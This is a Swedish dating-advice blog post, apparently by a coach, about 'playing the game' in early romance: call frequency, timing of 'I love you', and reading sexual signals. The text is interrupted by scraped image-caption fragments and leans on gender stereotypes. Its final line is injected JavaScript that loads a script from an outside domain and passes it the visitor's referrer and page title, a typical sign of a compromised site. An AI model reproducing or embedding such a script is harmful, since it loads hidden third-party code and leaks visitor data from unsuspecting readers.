När det kommer till kärlek så håller de flesta med att man ska inte spela ”spelet” . Men trots det så gör vi det allihopa.

Låt oss säga att du precis träffat en tjej. Vi kallar henne Anna.

Du måste nu ringa henne tillräckligt frekvent tidigt i förhållandet för att kommunicera ditt intresse. Problemet är att om du gör 446002532 0133e81973 229x300 Spelet.det allt för ofta så kommer du istället att vibba ”stalker varning”.

Hur ofta ska du då ringa?

Det finns inget rätt svar. En persons uppfattning av ”för frekvent” är en annans ” För Sällan” allt beror på hur ofta Anna tror att du borde höra av dig. Men reglerna av spelet säger att hon inte får ge dig rätt svar. Det vore att fuska. Du måste helt enkelt gissa dig fram till rätt antal. Kul eller hur icon wink Spelet.

För att göra ekvationen ännu besvärligare så slänger vi in ytterligare en faktor. Det är så att jag vet att Anna är en grym snygg tjej. En sak är säker när det gäller sådana tjejer. Är att de alltid har någon eller flera på G. Du är inte enda tuppen i hönshuset. Tjejer älskar relationer, de lever för relationer. Med detta i tanke, hur gör du för att inte hamna längst ner på hennes lista av möjliga män. Återigen är du för på så tappar du poäng och likaså om du väntar för länge. Så vad ska du göra? Återigen du måste gissa dig fram.

Vi säger att du har lyckats klara dig igenom de första hindren och saker och ting börja klicka mellan er två. Nu måste Anna vara väldigt försiktig med att uttala de tre magiska orden alldeles för tidigt. Hon måste tygla sina spontana impulser att säga ”Jag älskar dig”. Oavsett om det känns ärligt och hon misstänker (hoppas) att känslorna är besvarade så måste hon vänta ut  tillräckligt med TID i relationen. Därför att även om hon får dig att känna dig speciell så vill du inte bli puschad in i  relationen. Med detta i tankarna.
När är det rätt TID för Anna att säga att hon älskar dig?.

Återigen hon måste gissa.

Sex

Oavsett om ni bestämmer er för att bli intima på er första dejt, samma kväll ni träffas eller på er andra smekmånad så måste ni båda ha förmågan att subkommunicera, och läsa mellan raderna på ett ”icke verbalt språk” NÄR och HUR ni ska initiera sex. Misstolkar ni varandra signaler så är risken att någon blir avvisad i bästa fall eller anmäld i sämsta fall eller ännu värre.

Och för att göra saker ännu mer komplicerade: Människor sexuella signaler är ungefär som snöflingor—Ingen är sig den andra likt. Så vad du nu och Anna tror att ni lärt er avseende signaler från tidigare sexuella erfarenheter så behöver det inte gälla.

Men SPELET är så som hyckleri, det är en av de saker som människor tror att de är emot men i verkligheten så spelar alla dessa spel. I synnerhet då vår framgång inom kärlek och romans vilar i hur väl vi spelar.

Har du någon form av plan till hur du ska förhålla dig till din dejt, sambo, älskare så spelar du  spelet. Tjejer brukar tom ha strategiska möten för att hitta de bästa lösningar till spelet. De är när väninnor ska ut på ett glas vin .;) Vi män är sämre på att prata om sådana saker så vi förlitar oss till Hollywood att skräddarsy vår plan. Inte konstigt att det blir fel.

”Varför ska man hålla på att rävspela” har jag hört vid flertal med tillfällen. (Jag har sagt det själv) Varför räcker det inte med att säga vad man tycker. Sanningen är att det vore mycket enklare om det var så. Men relationer och i synnerhet vid lära känna varandra fasen är mer komplicerade en vad vi vetenskaplig vet. Alla dessa spel är mekanismer till att hantera förmågan att  skapa och behålla attraktion. Vilket om man inte är insatt är lättare sagt än gjort. Och ju sämre du lovers shore sunset 189x300 Spelet.är på det desto större kritiker är du till det.

Spelet vi spelar medan vi dejtar kan till synes verka både löjligt och barnsligt. Men kan i efterhand vara så viktigt. Hur många gånger har du hört par som berättar med glimmande ögon om allt som hände när de första började lära känna varandra samt hur starkt de vårdar de minnena.

Förmågan att spela spelet- Att ringa tillräckligt ofta för att kommunicera intresse och inte desperation; Att hålla tillbaka starka känslor till båda parter är redo att bekräfta dem; Att ha förmågan läsa någons kroppsspråk, pricka in varandra känslor, behov och begär demonstrerar att du har de emotionella kunskaperna och socialförmåga som kräv för att det ska fungera mellan er.

”Spelet är rytmen av din interaktion varpå du projicerar ditt inre tillstånd utåt .”

När du med framgång lyckas med detta så demonstrerar kunskaper i att hantera relationer. Vi säger att kärlek är det viktigast för oss som människor. Om det nu är så viktigt för dig!  Hur mycket tid lägger du ner för att lära dig detta? Har du rytmen eller är du helt taktlös? Vill du göra  något åt det eller fortsätta med ”Fy fan för rävspel”

btw En sak som Kian brukar berätta på våra intensivhelger; Vet ni vilket land som är bäst i världen på ”balroomdancing”.? Man skulle tycka att det vore latinamerika eller liknande, dem har ju rytmen i blodet…

Svaret är Finland.

Alla kan bli bättre på social interaktioner! Bara du har viljan att träna. icon wink Spelet.

Kram/ Gustavo

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;